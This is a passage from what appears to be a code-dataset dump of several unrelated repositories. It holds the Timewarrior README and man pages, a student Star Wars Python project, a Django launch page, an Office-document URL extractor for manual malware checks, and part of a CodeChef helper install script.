Timewarrior\n\n[![tests](https://github.com/GothenburgBitFactory/timewarrior/actions/workflows/tests.yaml/badge.svg)](https://github.com/GothenburgBitFactory/timewarrior/actions/workflows/tests.yaml)\n\nThank you for taking a look at Timewarrior!\n\nTimewarrior is a time tracking utility that offers simple stopwatch features as well as sophisticated calendar-based backfill, along with flexible reporting.\nIt is a portable, well supported and very active Open Source project.\n\n## Installing\n\n### From Package\n\nThanks to the community, there are binary packages available [here](https://timewarrior.net/docs/install.html#distributions).\n\n### Building Timewarrior\n\nBuilding Timewarrior yourself requires\n\n* git\n* cmake\n* make\n* C++ compiler with full C++14 support, currently gcc 6.1+ or clang 3.4+ \n* Python 3 (for running the testsuite)\n* Asciidoctor (for creating documentation)\n\nThere are two ways to retrieve the Timewarrior sources:\n\n* Clone the repository from Github,\n\n git clone --recurse-submodules https://github.com/GothenburgBitFactory/timewarrior\n cd timewarrior\n\n* Or download the tarball with curl,\n\n curl -O https://github.com/GothenburgBitFactory/timewarrior/releases/download/v1.4.3/timew-1.4.3.tar.gz\n\n and expand the tarball\n\n tar xzf timew-1.4.3.tar.gz\n cd timew-1.4.3\n\nBuild Timewarrior, optionally run the test suite, and install it.\n\n cmake -DCMAKE_BUILD_TYPE=release\n make\n [make test]\n sudo make install\n\nThis copies files into the right place (default under `/usr/local`), and installs man pages.\n\nAdd the optional parameter `-DCMAKE_INSTALL_PREFIX=/path/to/your/install/location` to the `cmake` command if you want to install Timewarrior at a location other than `/usr/local`.\nThe `make install` command may not require `sudo` depending on your choice of install location.\n\n## Documentation\n\nThere is extensive online documentation.\nYou'll find all the details at [timewarrior.net/docs/](https://timewarrior.net/docs/).\n\nThere you will find the documentation, downloads, news and more.\n\n## Contributing\n\nYour contributions are especially welcome.\nWhether it comes in the form of code patches, ideas, discussion, bug reports, encouragement or criticism, your input is needed.\n\nFor support options, take a look at [CONTRIBUTING.md](CONTRIBUTING.md) or visit [taskwarrior.org](https://taskwarrior.org/support).\n\nVisit [Github](https://github.com/GothenburgBitFactory/timewarrior) and participate in the future of Timewarrior.\n\n## License\n\nTimewarrior is released under the MIT license.\nFor details check the [LICENSE](LICENSE) file.\n" }, { "alpha_fraction": 0.6404109597206116, "alphanum_fraction": 0.6780821681022644, "avg_line_length": 16.176469802856445, "blob_id": "5280cb4192cfb10771969e66c3540e37911f6d96", "content_id": "fe38ec3a8122406f3646429ea6789c118e48e41b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 292, "license_type": "permissive", "max_line_length": 48, "num_lines": 17, "path": "/doc/man1/timew-export.1.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-export(1)\n\n== NAME\ntimew-export - export tracked time in JSON\n\n== SYNOPSIS\n[verse]\n*timew export* [_<range>_] [_<tag>_**...**]\n\n== DESCRIPTION\nExports all the tracked time in JSON format.\nSupports filtering.\n\n== EXAMPLES\nFor example:\n\n $ timew export from 2016-01-01 for 3wks tag1\n" }, { "alpha_fraction": 0.7170542478561401, "alphanum_fraction": 0.7209302186965942, "avg_line_length": 20.5, "blob_id": "19baf84877bf74c952b54ddaa41dc1cd14e09ee9", "content_id": "7c1aade381c26b57aa2dd765c92a2af701b14d41", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 258, "license_type": "permissive", "max_line_length": 80, "num_lines": 12, "path": "/doc/man1/timew-tags.1.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-tags(1)\n\n== NAME\ntimew-tags - display a list of tags\n\n== SYNOPSIS\n[verse]\n*timew tags* [_<range>_]\n\n== DESCRIPTION\nDisplays all the tags that have been used by default.\nWhen a filter is specified, shows only the tags that were used during that time.\n" } ]
13
Adrien-Itescia/starwars_itescia
https://github.com/Adrien-Itescia/starwars_itescia
a779ab5936226f7abf7eb44d8c76c98ff00cab54
9dd5c7e426cb56c635f3a1ede10480226e72a668
9077f49cba93a4ebbd5ead62570308da2944c59c
refs/heads/master
2020-09-21T17:46:24.885693
2019-11-29T14:41:14
2019-11-29T14:41:14
224,871,347
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6874462366104126, "alphanum_fraction": 0.7059329152107239, "avg_line_length": 33.75384521484375, "blob_id": "fce03e2fbd67dc54e42d5b22e9b299de74bb01cf", "content_id": "3022430c88f11fff599538606c6aaf90b9fc73bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2341, "license_type": "no_license", "max_line_length": 140, "num_lines": 65, "path": "/SWProject/MonProgramme.py", "repo_name": "Adrien-Itescia/starwars_itescia", "src_encoding": "UTF-8", "text": "from Acteurs import *\r\nfrom Film import *\r\nfrom Personnage import *\r\n\r\n\r\n# Création liste pour question 4\r\nmacollection = ['objet1','objet2','objet3']\r\nprint(macollection)\r\n\r\nfilm1 = film()\r\nacteurs1 = acteurs()\r\nprint(film1.titre,\"\\n\",\"Sortie en\",film1.anneesortie,\"\\n\",\"Episode n°\",film1.numeroepisode,\"\\n\",\r\n \"Son cout:\",film1.cout,\"\\n\",\"Sa recette:\",film1.recette,\"\\n\",\"L'acteur principal\",acteurs1.prenom,acteurs1.nom)\r\n\r\nprint(\"\\n\",\"Saisir les informations pour le deuxieme film\")\r\nfilm1.titre = input(\"Saisir le titre: \")\r\nfilm1.anneesortie = input(\"Saisir l'annee sortie \")\r\nfilm1.numeroepisode = input(\"Saisir le numéro episode \")\r\nfilm1.cout = input(\"Saisir Cout \")\r\nfilm1.recette = input(\"Saisir recette \")\r\nacteurs1.nom = input(\"Saisir le nom de l'acteur \")\r\nacteurs1.prenom = input(\"Saisir le prenom de l'acteur \")\r\n\r\nfilm2=film()\r\nacteurs2=acteurs\r\nprint(\"\\n\",\"Les informations sur le deuxième film:\",\"\\n\",film1.titre,\"\\n\",\"Sortie en\",film1.anneesortie,\"\\n\",\"Episode n°\",\r\n film1.numeroepisode,\"\\n\",\"Son cout\",film1.cout,\"\\n\",\"Sa recette\",film1.recette,\"\\n\",\"L'acteur principal\",acteurs1.prenom,acteurs1.nom)\r\n\r\n# Crée le premier personnage\r\npersonnage1=personnage()\r\nprint(\"\\n\", \"Création personnage\")\r\npersonnage1.nom = input(\"Saisir son nom \")\r\npersonnage1.prenom = input(\"Saisir prenom \")\r\nprint(\"Le personnage est:\",personnage1.prenom,personnage1.nom)\r\n\r\n\r\nliste = []\r\nn = int(input(\"Saisir le nombre de personnages incarnés par un seul acteur : \"))\r\nprint(\"Saisir le nom et prénom sur chaque ligne\")\r\n\r\n# Boucle qui permet d'attribuer plusieurs personnages à un seul acteur\r\nfor i in range(0, n):\r\n element = str(input())\r\n liste.append(element) # Ajoute l'élément\r\n\r\n# Assigne les noms et au prénoms au duet\r\nacteurs.duet = liste\r\n# Affiche la valeur retournée par le duet\r\nfor i in range(0, n):\r\n print(acteurs.duet[i])\r\n\r\n\r\n\r\nacteur3=acteurs\r\n# Retourne le nombre de personnage joué par un acteur\r\nacteurs.nbPersonnages = n\r\nacteurs.nom = input(\"Saisir le nom de l'acteur \")\r\nprint(\"L'acteur\", acteurs.nom,\"joue\",acteurs.nbPersonnages, \"personnages\")\r\n\r\nprint(\"\\n\",\"Le nombre d'acteurs est\",film2.nbActeurs)\r\nprint(\"Le nombre de personnages est\", film2.nbPersonnages)\r\nprint(film2.get_calculBenefice())\r\nprint(film2.get_isBefore())\r\nprint(film2.get_tri())\r\nfilm2.get_makeBackup()\r\n\r\n" }, { "alpha_fraction": 0.543175458908081, "alphanum_fraction": 0.543175458908081, "avg_line_length": 20.4375, "blob_id": "9a908c058c316dd038f4443fe6a4ad2772728e0b", "content_id": "157bfba17aec4a24e1b67b58e37faf07bc147443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 359, "license_type": "no_license", "max_line_length": 54, "num_lines": 16, "path": "/SWProject/Personnage.py", "repo_name": "Adrien-Itescia/starwars_itescia", "src_encoding": "UTF-8", "text": "class personnage:\r\n def __init__(self, nom=\"ObiWan\", prenom=\"Kenobi\"):\r\n self.nom = nom\r\n self.prenom = prenom\r\n\r\n def get_nom(self):\r\n return self.nom\r\n\r\n def get_prenom(self):\r\n return self.prenom\r\n\r\n def set_nom(self, nom):\r\n self.nom = nom\r\n\r\n def set_prenom(self, prenom):\r\n self.prenom = prenom\r\n" }, { "alpha_fraction": 0.5794270634651184, "alphanum_fraction": 0.5846354365348816, "avg_line_length": 22.838708877563477, "blob_id": "8a90b3acc374ced49849a32ab40e6aab247137c6", "content_id": "538855101250e38d961521b813dfdc0fa6562505", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 768, "license_type": "no_license", "max_line_length": 106, "num_lines": 31, "path": "/SWProject/Acteurs.py", "repo_name": "Adrien-Itescia/starwars_itescia", "src_encoding": "UTF-8", "text": "# Question 1\r\nclass acteurs:\r\n def __init__(self, nom=\"Wick\", prenom=\"John\", duet=[\"personnage1\", \"personnage2\"], nbPersonnages = 0):\r\n self.nom = nom\r\n self.prenom = prenom\r\n self.duet = duet\r\n self.nbPersonnages = nbPersonnages\r\n\r\n def get_nom(self):\r\n return self.nom\r\n\r\n def get_prenom(self):\r\n return self.prenom\r\n\r\n def get_duet(self):\r\n return self.duet\r\n\r\n def get_nbPersonnages(self):\r\n return self.nbPersonnages\r\n\r\n def set_nom(self, nom):\r\n self.nom = nom\r\n\r\n def set_prenom(self, prenom):\r\n self.prenom = prenom\r\n\r\n def set_duet(self, duet):\r\n self.duet = duet\r\n\r\n def set_nbPersonnages(self, nbPersonnages):\r\n self.nbPersonnages = nbPersonnages" }, { "alpha_fraction": 0.5987308621406555, "alphanum_fraction": 0.6076894402503967, "avg_line_length": 25.639175415039062, "blob_id": "6397b9eb99dedd38e1216040681ad8ffced73bbe", "content_id": "ea539d215ec29a4ba2cfdd2c708b76f4ddfa205b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2682, "license_type": "no_license", "max_line_length": 151, "num_lines": 97, "path": "/SWProject/Film.py", "repo_name": "Adrien-Itescia/starwars_itescia", "src_encoding": "UTF-8", "text": "class film:\r\n def __init__(self, titre=\"La revanche de R2D2\", anneesortie=2000, numeroepisode=5, cout=1000, recette=5000, collection=['R2D2', 'Vador', 'Obiwan'],\r\n nbActeurs=3, nbPersonnages=7):\r\n self.titre = titre\r\n self.anneesortie = anneesortie\r\n self.numeroepisode = numeroepisode\r\n self.cout = cout\r\n self.recette = recette\r\n self.collection = collection\r\n self.nbActeurs = nbActeurs\r\n self.nbPersonnages = nbPersonnages\r\n\r\n# Retourne la valeur de la fonction appellée\r\n def get_titre(self):\r\n return self.titre\r\n\r\n def get_anneesortie(self):\r\n return self.anneesortie\r\n\r\n def get_numeroepisode(self):\r\n return self.numeroepisode\r\n\r\n def get_cout(self):\r\n return self.cout\r\n\r\n def get_recette(self):\r\n return self.recette\r\n\r\n def get_collection(self):\r\n return self.collection\r\n\r\n def get_nbActeurs(self):\r\n return self.nbActeurs\r\n\r\n def get_nbPersonnages(self):\r\n return self.nbPersonnages\r\n\r\n def get_calculBenefice(self):\r\n valeur = self.recette - self.cout\r\n if self.recette > self.cout:\r\n print(\"Le film rapporte un benefice de\", valeur)\r\n else:\r\n print(\"Le perd un montant de\", valeur)\r\n return valeur\r\n\r\n def get_isBefore(self):\r\n if self.anneesortie > 2000:\r\n val = False\r\n else: val = True\r\n return val\r\n\r\n def get_tri(self):\r\n return sorted(self.collection)\r\n\r\n def get_makeBackup(self):\r\n dictionnaire = {\r\n 1: self.anneesortie\r\n }\r\n print(dictionnaire)\r\n return dictionnaire\r\n\r\n# Définie une valeur pour la fonction appellée\r\n def set_titre(self, titre):\r\n self.titre = titre\r\n\r\n def set_anneesortie(self, anneesortie):\r\n self.anneesortie = anneesortie\r\n\r\n def set_numeroepisode(self, numeroepisode):\r\n self.numeroepisode = numeroepisode\r\n\r\n def set_cout(self, cout):\r\n self.cout = cout\r\n\r\n def set_recette(self, recette):\r\n self.recette = recette\r\n\r\n def set_collection(self, collection):\r\n self.collection = collection\r\n\r\n def set_nbActeurs(self, nbActeurs):\r\n self.nbActeurs = nbActeurs\r\n\r\n def set_nbPersonnages(self, nbPersonnages):\r\n self.nbPersonnages = nbPersonnages\r\n\r\n def set_calculBenefice(self, calculBenefice):\r\n self.calculBenefice = calculBenefice\r\n\r\n def set_isBefore(self, isBefore):\r\n self.isBefore = isBefore\r\n\r\n def set_tri(self, tri):\r\n self.tri = tri\r\n\r\n def set_makeBackup(self, makeBackup):\r\n self.makeBackup = makeBackup" } ]
4
vmueller12/Launch-Project-in-Django
https://github.com/vmueller12/Launch-Project-in-Django
3ee9f198f76787d432fcb234eb5f5971fcbf2339
ab6f98277005629ec703fa0b99a7a0e8e4d15be4
e3a617da9570a5399088f16428e2468d5dc89d3e
refs/heads/master
2016-08-08T22:43:07.125309
2015-10-29T11:37:19
2015-10-29T11:37:19
44,969,215
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5249999761581421, "alphanum_fraction": 0.5416666865348816, "avg_line_length": 29.006755828857422, "blob_id": "609044b958b8998c58fb5e0fdb5bd47bf683bfed", "content_id": "055f16bd1c9f714da99738410c31f3b95f11dc0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 4440, "license_type": "no_license", "max_line_length": 129, "num_lines": 148, "path": "/launch/templates/home.html", "repo_name": "vmueller12/Launch-Project-in-Django", "src_encoding": "UTF-8", "text": "{% extends 'base.html' %}\n{% load staticfiles %}\n\n{% block styles %}\n\n\n body {\n border-top: 4px solid #1e4e70;\n /*min-height: 5000px;*/\n /*min-width: 5000px;*/\n background: url('{% static \"img/sea2.jpg\" %}') no-repeat center center fixed;\n -webkit-background-size: cover;\n -moz-background-size: cover;\n -o-background-size: conver;\n background-size: cover;\n /*background-image: url('{% static \"img/beach.jpg\" %}');*/\n /*background-image:url('https://lh4.googleusercontent.com/-FsgMNhfQLSg/AAAAAAAAAAI/AAAAAAAAaRY/3VnF3vSuWKk/photo.jpg');*/\n /*background-repeat: repeat-x;*/\n }\n \n .jumbotron h1 {\n \n font-weight: 100 !important;\n \n \n }\n \n \n\n\n{% endblock %}\n\n{% block content %}\n\n <!-- Main component for a primary marketing message or call to action -->\n <div class=\"jumbotron\" style=\"background-color: white\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-sm-6\">\n <h1>Backpackers Home</h1>\n <br/><br/>\n <p>Connect with Backpackers Around the Globe and Make your experience memorable...</p>\n <p>Meet new people and travel together to explore different places...</p>\n <p>Come and Join us to be part of the most exciting journey of your live!</p>\n <p><a class=\"btn btn-default btn-lg btn-block\" href='#signup' role=\"button\">Be First &raquo;</a></p>\n </div>\n <div class='col-sm-6'>\n <img src=\"{% static 'img/theglobepack.png' %}\" class='img-responsive' />\n </div>\n </div>\n <hr/>\n </div><!-- /container -->\n\n </div> \n\n\n<div class=\"container text-center\" style=\"color:#FFFFFF;\" id=\"signup\">\n <div class='col-sm-6 col-sm-offset-3'>\n <i class=\"fa fa-key fa-5x\"></i>\n <h1>Unlock First</h1>\n \n <form class='form-horizontal' method=\"POST\" action=\"\"> {% csrf_token %}\n <div class='form-group form-group-lg'>\n \n \n <div class=\"input-group\">\n <input class='form-control' type=\"email\" name=\"email\" placeholder=\"Your email...\" />\n <span class='input-group-btn'>\n <input type='submit' value='Join' class='btn btn-primary btn-lg' />\n </span>\n </div>\n {% if form.email.errors %}\n {% for err in form.email.errors %}\n <!--<div class=\"alert alert-danger\" role=\"alert\">{{ err }}</div>-->\n <p style=\"margin-top: 8px; color: red;\"><b>Your Email is required</b></p>\n {% endfor %}\n {% endif %}\n </div>\n </form>\n <p class='lead'>Sign up here. <br/> Get First News on Content</p>\n </div>\n\n</div>\n\n<div class=\"container-fluid\">\n<div class='row' style='text-align:center;background-color:white;margin-top: 80px;padding-bottom: 20px;min-height:200px;'>\n <div class='col-sm-12'>\n <br/>\n <h1>Services You Get!</h1>\n <br/>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-comment fa-3x\"></i>\n <h2>Chat Service</h2>\n <p class='lead'>\n Communicate with your Backpacker Mates.\n </p>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-users fa-3x\"></i>\n <h2>Match Selection</h2>\n <p class='lead'>\n Select a BP Mate, which has similar intrests.\n </p>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-share-alt fa-3x\"></i>\n <h2>Share your Images and Videos</h2>\n <p class='lead'>\n Share your experience with new Backpackers.\n Get Rewards for the best retad Video or Image.\n </p>\n </div>\n <!-- \n</div>\n<div class='row' style='text-align:center;background-color:white;margin-bottom:0px; padding-bottom: 40px; min-height:200px;'>\n <div class='col-sm-12'>\n <hr/>\n <br/>\n <br/><br/>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-comment fa-3x\"></i>\n <h2>Accomandation</h2>\n <p class='lead'>\n Find a place to stay.\n </p>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-users fa-3x\"></i>\n <h2>Jobs</h2>\n <p class='lead'>\n Find a Backpacker Job\n </p>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-share-alt fa-3x\"></i>\n <h2>Book Your Adventure Trip with Us!</h2>\n <p class='lead'>\n Get discounted travel tickets and much more...\n </p>\n </div>\n\n</div>\n -->\n</div>\n\n{% endblock %}" }, { "alpha_fraction": 0.5131579041481018, "alphanum_fraction": 0.5131579041481018, "avg_line_length": 25.25, "blob_id": "1ce1fb31e452e4e97ae7b6a998643ca479aae9b6", "content_id": "519a600d3b37dbc0cf1651e1e9546f624d5b5725", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 532, "license_type": "no_license", "max_line_length": 52, "num_lines": 20, "path": "/launch/launch/middleware.py", "repo_name": "vmueller12/Launch-Project-in-Django", "src_encoding": "UTF-8", "text": "from welcome.models import Join\n\n\nclass ReferMiddleware():\n \n def process_request(self, request):\n ref_id = request.GET.get(\"ref\", \"\")\n print \"HHHHHHHHHHHHHHHHHHHH\"\n try:\n obj = Join.objects.get(ref_id=ref_id)\n # It it does exsist\n print obj\n except:\n # Object does not exsist in the Database\n # with the ref_id number\n obj = None\n \n if obj:\n request.session['ref'] = obj.id\n print obj.id\n " }, { "alpha_fraction": 0.5674542784690857, "alphanum_fraction": 0.5724085569381714, "avg_line_length": 27.813186645507812, "blob_id": "45f77d9c3c5937ff1eebea42295ee5f369bdfb09", "content_id": "0ea846a313344e5bad7265926ef76b4cd5e69d68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2624, "license_type": "no_license", "max_line_length": 78, "num_lines": 91, "path": "/launch/welcome/views.py", "repo_name": "vmueller12/Launch-Project-in-Django", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.shortcuts import render, redirect, Http404\nfrom .forms import EmailForm, JoinForm\nfrom .models import Join\n\nimport uuid\n\ndef get_ref_id():\n # We check if we have an unique reference ID\n ref_id = str(uuid.uuid4())[:11].replace('-', '').lower()\n try:\n id_exists = Join.objects.get(ref_id=ref_id) \n get_ref_id()\n except:\n # Does not exist\n return ref_id\n\n\ndef get_ip(request):\n \"\"\"get_ip function to grab the Id address from the client\"\"\"\n try:\n x_forward = request.META.get(\"HTTP_X_FORWARDED_FOR\")\n if x_forward != None:\n ip = x_forward.split(\",\")[0]\n else:\n ip = request.META.get(\"REMOTE_ADDR\") \n except:\n ip = ''\n return ip\n\n\ndef share(request, ref_id):\n try:\n join_obj = Join.objects.get(ref_id=ref_id)\n friends_referred = Join.objects.filter(friend=join_obj)\n count = join_obj.referral.all().count()\n ref_url = settings.SHARE_URL + str(join_obj.ref_id)\n context = {\"ref_id\":join_obj.ref_id,\"count\": count,\"ref_url\": ref_url}\n template = \"share.html\"\n return render(request,template,context)\n # except Join.DoesNotExsist:\n # raise Http404\n except:\n raise Http404\n\n\n# Create your views here.\ndef home(request):\n try:\n join_id = request.session['ref']\n obj = Join.objects.get(id=join_id)\n except:\n join_id = None\n \n # print \"the id is \" + str(join_id) + \" \" + str(obj.email)\n\n form = JoinForm(request.POST or None)\n if form.is_valid():\n new_join = form.save(commit=False)\n # We might do here some stuff before we save the\n # Form to the Database / Model\n email = form.cleaned_data['email']\n new_join_old, created = Join.objects.get_or_create(email=email)\n if created:\n new_join_old.ref_id = get_ref_id()\n \n if not obj == None:\n new_join_old.friend = obj\n new_join_old.ip_address = get_ip(request)\n new_join_old.save()\n \n # print all friends that joined as a result of sharer email\n #print Join.objects.filter(friend=obj)\n ##print obj.referral.all().count()\n \n #redirect here\n return redirect(\"/\"+str(new_join_old.ref_id))\n \n #new_join.ip_address = get_ip(request)\n #new_join.save() \n # end\n \n context = {\n 'form': form,\n \n }\n return render(request, \"home.html\", context)\n\n\ndef testhome(request):\n return render(request, \"donotuse.html\", {})\n\n\n" } ]
3
ondolist/CheckOfficeSafety
https://github.com/ondolist/CheckOfficeSafety
da624b98c2c1f258741d3bdded80b51067b2ebac
523eb2d16e02b1c60c630ad3fda5fe22f0236da8
fabf0cb8d98e33256bcc167707150e1040103d53
refs/heads/main
2023-08-25T01:11:45.484289
2021-11-07T06:55:57
2021-11-07T06:55:57
365,227,998
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4716311991214752, "alphanum_fraction": 0.481947124004364, "avg_line_length": 26.210525512695312, "blob_id": "49a5e0a582f03094e96c5760d6f0afa21e539dc8", "content_id": "6a7fa329e391495e4df69f0dafa8612ff5e04428", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3112, "license_type": "no_license", "max_line_length": 212, "num_lines": 114, "path": "/url_extractor.py", "repo_name": "ondolist/CheckOfficeSafety", "src_encoding": "UTF-8", "text": "import zipfile\nimport re \nimport os\nimport random\nimport string\nimport shutil\nimport sys\n#from urlextract import URLExtract\n\nprint(\"-----------------------------------------------------------------------------------\")\nprint(\"File name: \"+sys.argv[1])\nprint(\"-----------------------------------------------------------------------------------\")\nprint(\"\")\nprint(\"\")\nprint(\"\")\n\n\ncommon_domains=[\"schemas.openxmlformats.org\", \"www.w3.org\", \"schemas.microsoft.com\"]\nsuspicious_keywords=['ole']\n\n\nletters = string.ascii_lowercase\nrandom_string=''.join(random.choice(letters) for i in range(10))\n \nfantasy_zip = zipfile.ZipFile(sys.argv[1])\nfantasy_zip.extractall('extract_temp\\\\'+random_string+\"\\\\\")\nfantasy_zip.close()\n\n\npath = 'extract_temp\\\\'+random_string+\"\\\\\"\n\n\nfiles = []\n# r=root, d=directories, f = files\nfor r, d, f in os.walk(path):\n\tfor file in f:\n\t\tfiles.append(os.path.join(r, file))\n\ndomains=[]\n\nunusual_urls=[]\nsuspicious_urls=[]\nfor f in files:\n\tcurrent_urls=[]\n\tfp=open(f, \"rb\")\n\tcontent=fp.read()\n\tcontent=content.decode('latin1')\n\n\n\t#m = re.findall('\"(http[s]?://(?:[a-zA-Z]|[0-9]|[$\\-@\\.&+:/?=]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)\"', content)\n\t\n\tm = re.findall('([a-zA-Z]+://[^\"<\\'\\s]+)', content)\n\t\n\t#m = re.findall(r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\", content)\n\t#'''\n\t#extractor=URLExtract()\n\t#m=extractor.find_urls(content)\n\n\n\tprint(\"======= \"+f.split(random_string)[1]+\" =======\")\n\tfor url in m:\n\t\turl=url.encode('latin1')\n\t\turl=url.decode('utf-8')\n\t\tif url not in current_urls:\n\t\t\tcurrent_urls.append(url)\n\t\t\tprint(url)\n\t\t\ttry:\n\t\t\t\tdomain=url.split(\"//\")[1].split(\"/\")[0]\n\t\t\texcept:\n\t\t\t\tdomain=url\n\t\t\tif domain not in domains:\n\t\t\t\tdomains.append(domain)\n\t\t\tif domain not in common_domains:\n\t\t\t\tunusual_urls.append((f, url))\n\t\t\tfor word in suspicious_keywords:\n\t\t\t\tif word in url:\n\t\t\t\t\tsuspicious_urls.append((f, url))\n\t\t\t\t\tunusual_urls.append((f, url))\n\t\t\t\n\t\t\n\n\tprint(\"\")\n\tfp.close()\n\nprint(\"delete temporary files.\")\nprint(os.path.abspath(path))\nshutil.rmtree(path)\n\nprint(\"++++++++++++++++++++++ found domains ++++++++++++++++++++++\")\nfor domain in domains:\n\tprint(domain)\nprint(\"++++++++++++++++++++++ found domains ++++++++++++++++++++++\")\n\n\n\nif len(unusual_urls) != 0:\n\tprint(\"\\n\\n\\n\")\n\tprint(\"++++++++++++++++++++++ unusual urls ++++++++++++++++++++++\\n\")\n\tfor url in unusual_urls:\n\t\tprint(url[0].split(random_string)[1]+\":\\t\"+url[1])\n\tprint(\"\\n++++++++++++++++++++++ unusual urls ++++++++++++++++++++++\")\n\n\t\nif len(suspicious_urls) != 0:\n\tprint(\"\\n\\n\\n\")\n\tprint(\"++++++++++++++++++++++ suspicious urls ++++++++++++++++++++++\\n\")\n\tfor url in suspicious_urls:\n\t\tprint(url[0].split(random_string)[1]+\":\\t\"+url[1])\n\tprint(\"\\n++++++++++++++++++++++ suspicious urls ++++++++++++++++++++++\")\n\nprint(\"\\n\\n\\n\")\nprint(\"-----------------------------------------------------------------------------------\")\nprint(\"File name: \"+sys.argv[1])\nprint(\"-----------------------------------------------------------------------------------\")\n" }, { "alpha_fraction": 0.7106227278709412, "alphanum_fraction": 0.7106227278709412, "avg_line_length": 33.125, "blob_id": "4ce896e30cfed47e325ea016970503c7a8ecc58b", "content_id": "9dcdd3f2bcb97f1a36af538adaf3c10ec47db499", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 397, "license_type": "no_license", "max_line_length": 103, "num_lines": 8, "path": "/README.md", "repo_name": "ondolist/CheckOfficeSafety", "src_encoding": "UTF-8", "text": "# Check Office Safety\nContext Menu에 추가해서 마이크로소프트 오피스 파일(docx, pptx, xlsx...)의 악성코드를 수동으로 검출하는데 도움을 주는 스크립트</br>\n</br>\n## 필요한 파이썬 모듈</br>\noletools</br>\n</br>\n## 사용법</br>\nC:\\Users\\\\[user name]\\AppData\\Roaming\\Microsoft\\Windows\\SendTo 에 msoffice_analysis.bat의 lnk 파일(바로가기) 복사\n" } ]
2
arjbholu/code-now-CodeChef
https://github.com/arjbholu/code-now-CodeChef
f819bf743b55a0ebe0d35c55fb3b8c1b1802f756
bc37f9cf9c784efc278624576c0ce901c85129bc
df10467e7ff6778ca84ed4752bc041538ad4ecfb
refs/heads/master
2020-12-26T01:38:55.196888
2015-07-15T06:13:03
2015-07-15T06:13:06
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6656668782234192, "alphanum_fraction": 0.6758648157119751, "avg_line_length": 26.327869415283203, "blob_id": "b3c2656536c54da1b6dc5158630cfea5e271d84d", "content_id": "fd721dfcb7584a8fb83d5042a2a785a3a91251a9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5001, "license_type": "permissive", "max_line_length": 257, "num_lines": 183, "path": "/host-program/install.sh", "repo_name": "arjbholu/code-now-CodeChef", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nROOT_UID=\"0\"\n\n#Check if run as root\nif [ \"$UID\" -eq \"$ROOT_UID\" ] ; then\n\techo \"Root Privileges Detected....!!\"\n\techo \"Please Run this script without root privileges\"\n\texit 127\nfi\n\n#Checking if Python is installed\nif hash python > /dev/null 2>&1;\nthen\n\techo \"Python Detected . . . . . . . . .\"\nelse\n\techo \"Python Not found !! Please install python and try again\"\n\techo \"Terminating ..........!!\"\n\texit 127\nfi\n\n#Checking if Google-Chrome is installed\nischrome=0\nif hash google-chrome > /dev/null 2>&1;\nthen\n\techo \"Google Chrome Detected . . . . . .\"\n\tischrome=1\nfi\n\n#Checking if Chromium Browser is installed\nischromium=0\nif hash chromium-browser > /dev/null 2>&1;\nthen\n\techo \"Chromium Browser Detected . . . . . .\"\n\tischromium=1\nfi\n\nif [ $ischrome -eq 0 ] && [ $ischromium -eq 0 ]\nthen\n\techo \"Neither Google Chrome nor chromium was found !! Please download and install google chrome from https://www.google.com/chrome/browser/\"\n\techo \"Installation Incomplete\"\n\techo \"Terminating ............!!\"\n\texit 127\nfi\n\necho \"The installation folder comes with 3 template files for C, C++ and Java. All new codes will contain their repective templates. Use these template files to include/import all the required header files and classes. Enter Y or y if you want to continue:\"\n\nread choice\n\nif [ $choice != \"Y\" ] && [ $choice != \"y\" ]\nthen\n\techo \"Installation Incomplete ..........\"\n\techo \"Terminating ..............!!\"\n\texit 127\nfi\n\n#At this point as pre-requisites are met. Proceeding with installation\n\n# Reading the settings Parameter Here\nch=1\nwhile [ $ch -eq 1 ]\ndo\necho \"Enter the IDE for C :\"\nread cide\nif hash $cide > /dev/null 2>&1;\nthen\n\techo \"$cide was found on your system !! Successfully Configured ...........\"\n\tch=0\nelse\n\techo \"No software named $cide was not found on your system !!\"\nfi\ndone\n\nch=1\nwhile [ $ch -eq 1 ]\ndo\necho \"Enter the IDE for C++ :\"\nread cppide\nif hash $cppide > /dev/null 2>&1;\nthen\n\techo \"$cppide was found on your system !! Successfully Configured ...........\"\n\tch=0\nelse\n\techo \"No software named $cppide was not found on your system !!\"\nfi\ndone\n\nch=1\nwhile [ $ch -eq 1 ]\ndo\necho 